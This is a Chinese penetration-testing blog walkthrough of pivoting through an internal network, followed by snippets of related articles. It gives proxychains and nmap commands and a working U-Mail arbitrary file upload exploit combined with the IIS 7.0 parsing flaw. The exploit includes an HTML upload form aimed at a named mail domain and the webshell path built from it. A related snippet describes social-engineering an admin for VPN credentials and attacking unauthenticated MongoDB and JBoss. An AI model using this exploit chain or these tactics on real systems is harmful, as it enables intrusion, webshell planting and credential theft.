内网漫游-模拟真实环境【二】

上篇讲到了我们已经拿到了内网192.168.1.123服务器

拿到192.168.1.123服务器后 要进行内网漫游 需要挂代理

当我们使用菜刀进行信息收集时,发现权限不够,这里就需要提权了

同时发现192.168.1.123开放了3389,445端口,我们可以使用溢出进行提权

这里对挂代理 提权及445端口的入侵就不过多描述了,可以看我之前的文章

https://www.cnblogs.com/G-Shadow/p/10965035.html

这里可以使用之前的注入点进行添加账户,并加入管理员组

(以下操作都为代理后的操作)

使用代理打开远程桌面连接 连接192.168.1.123 进行信息收集

proxychains rdesktop IP

使用自己新建的用户名登录,发现在Administrator的桌面下有个txt 文件 打开发现一个mail的用户及密码,一个路由的用户及密码

尝试不挂代理登录发现不允许IP登录,说明路由对登录进行限制

使用代理登录,成功进入路由界面,但是是普通权限

通过路由发现内网还有一台IP为172.19.23.123的服务器(192.168.1.25为缓存)

通过路由发现,内网的IP可以相互访问

使用nmap对172.19.23.123的端口进行扫描

proxychains proxychains nmap -vvv -n -sT -PN ip

172.19.23.123开放了80,135,139等端口

使用浏览器对172.19.23.123访问发现web服务

一个邮件的cms U-MAIL 需要登录,使用之前获得的mail的用户及密码成功登录

发现该网站为IIS 7.0搭建,而IIS 7.0存在解析漏洞   在一个文件路径(/xx.jpg)后面加上/.php会将xx.jpg/.php解析为php文件

尝试在网上搜索 发现U-MAIL存在任意文件上传漏洞

这里登录的账号为:xgk

获取当前登录用户的user_id:3

http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=xgk

通过上传一个.jpg的文件获取上传后获取"file_id":

html exp:

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>

上传文件:<input type="file" name="Filedata" size="30">

<INPUT type=submit value=上传 name=Submit>

利用解析漏洞上传 ff.jpg 的图片马

"file_id":15598087474

shell地址:

http://172.19.23.123/webmail/client/cache/{user_id}/{file_id}.php

这里是:

http://172.19.23.123/webmail/client/cache/3/15598087474.jpg/.php

成功上传大马,这样我们就拿到了172.19.23.123的服务器

原文地址:https://www.cnblogs.com/G-Shadow/p/10994212.html

时间: 2024-10-21 06:57:13

内网漫游-模拟真实环境【二】的相关文章

ASA842只允许内网主动发起访问的流量进行PAT测试

一.需求 1.内网服务器主动发起的访问都进行PAT,对外统一为一个地址 2.外部访问内网服务器的某些指定端口(比如TCP22,23),用的目标地址为内网服务器的真实地址 二.解决方案 1.配置动态PAT,让出去的流量进行地址转换,同时配置静态PAT,让进来的流量仍然用服务器真实地址 2.或者,配置动态PAT,让出去的流量进行地址转换,同时配置策略NAT(Twice-NAT),让源端口为指定端口的出去的流量转换后的地址为自身地址 3.通过测试,上面两种方式PAT出去的地址都可以为内网在用服务器的地

用VMware Workstation 11的LAN区段功能构造内网环境

原来用host only模式构造内网环境,只是虚拟机访问不了外网,但其实主机还是能连上这个网段,不能很好的模拟真实环境. 后来有人和我说了一种方法,把这个复选框钩去掉,就可以让主机访问不了这个网段 但是这个方法有个缺点,当需要内网划分多个子网时,就要创建多个host only的虚拟网卡,就要在系统里生成多个虚拟网卡,老版本的VMware总共支持10个虚拟网卡,新版本VMware11支持20个,扣除VMnet0.VMnet1.VMnet8,就分别只能构造7个或17个自定义网络 而采用LAN区段方式

搭建内网NTP时间服务器

          搭建内网的NTP时间服务器 需求:搭建一台时间服务器,使得无外网的服务器可以同步时间. 一.环境 1. [[email protected] ~]# cat /etc/redhat-release 2. CentOS release 6.8 (Final) 3. [[email protected] ~]# hostname -I 4. 10.0.0.61 172.16.1.61 5. #外网10.0.0.61;内网172.16.1.61 二.安装ntp并检查是否安装成功 1

记一次内网渗透

信息收集拿到了此公司二级域名 有内网有外网 web不存在明显的重大漏洞,反射的xss flash的csrf 测试页面 phpinfo等这些漏洞还是存在的 但是目地是进内网拿到核心数据. 通过bbs拿到了某管理的QQ 进行社工  社工了印象笔记 里面存有公司的vpn密码,可以登录. 此前已经拿到了内网的域名 访问内网域名,确实全部在vpn登录进去的这个网段 几乎所有解析都指向192.168.1这个网段,存在mongodb未授权访问,但拿不到webshell,还有jboss存在invoker 可以查

部分3G网卡连接Cisco VPN后不能访问内网资源

部分3G网卡连接Cisco VPN后不能访问内网资源 现象:使用3G网卡连接网络后,访问互联网正常,连接Cisco IPSec VPN后,不能连接公司内网服务器. 使用环境:Windows7.cisco VPN.联通3G网卡 解决方法:修改3G网卡连接类型为modem 注:并非所有的3G卡都需要如上设置,因为版本和供应商不同默认的模式也不同.

持续集成(二)环境搭建篇—内网邮件server搭建

在我们的持续构建中,项目构建中出现错误提醒.或者开发者之间的沟通交流,进度汇报的事务,都是离不开一个通信工具.那就是邮件.在我们的项目开发中假设使用第三方的邮件平台,这肯定不是最好的选择.由于第三方的邮件须要外网的支持,可是外网又不是特别的可靠,假如外网链接出现了问题,这样就会不必要的延误我们的工期.再或者非常多项目都是保密项目,在开发中仅仅能用内网. 可是不用邮件吧又不行.为了解决这个头疼的问题,我们的内网邮件server工具就出现了,仅仅要用它安装在我们的server上.配置好账户.配置好c

内网IP环境搭建的ERP/OA/CRM如何实现远程互访?

前言 大多数企业都会在公司总部搭建各类项目管理办公系统(如OA.ERP.CRM.收银系统等等)进行运作管理,以提高员工的办公效率及提升企业的管理水平. 但随着公司的不断发展扩大规模,则会在全国甚至全球设立起分公司.办事处.生产基地.仓储中心等分支机构,而且也会有休假在家.出差在外等需要移动办公人员. 面对数量众多并且分散在各地的分支机构,要如何实现访问到公司总部所搭建的办公系统呢?接下来就由小编来给大家支几招,如何通过Oray的产品化解以上企业常见难题. 一.花生壳域名解析软件 http://h

持续集成(二)工具搭建篇—内网邮件服务器搭建

在我们的持续构建中,项目构建中出现错误提醒,或者开发人员之间的沟通交流,进度汇报的事务,都是离不开一个通信工具,那就是邮件.在我们的项目开发中如果使用第三方的邮件平台,这肯定不是最好的选择,因为第三方的邮件需要外网的支持,但是外网又不是特别的可靠,假如外网链接出现了问题,这样就会不必要的延误我们的工期.再或者很多项目都是保密项目,在开发中只能用内网.但是不用邮件吧又不行.为了解决这个头疼的问题,我们的内网邮件服务器工具就出现了,只要用它安装在我们的服务器上,配置好账户,配置好客户端,在内网里就可

Hyperledger Fabric 1.0 从零开始(三)——内网(准离线)环境构建

有公网环境的服务器可以直接看 Hyperledger Fabric 1.0 从零开始(二)--公网环境构建 ,本篇内容与上篇相似,只不过环境搭建需要在内网下,也就是网络被限制的情况下. 1:环境构建与测试 在本文中用到的宿主机环境是Centos ,版本为Centos.x86_647.2,通过Docker 容器来运行Fabric的节点,版本为v1.0.因此,启动Fabric网络中的节点需要先安装Docker.Docker-compose和Go语言环境,然后在网上拉取相关的Docker镜像,再通过配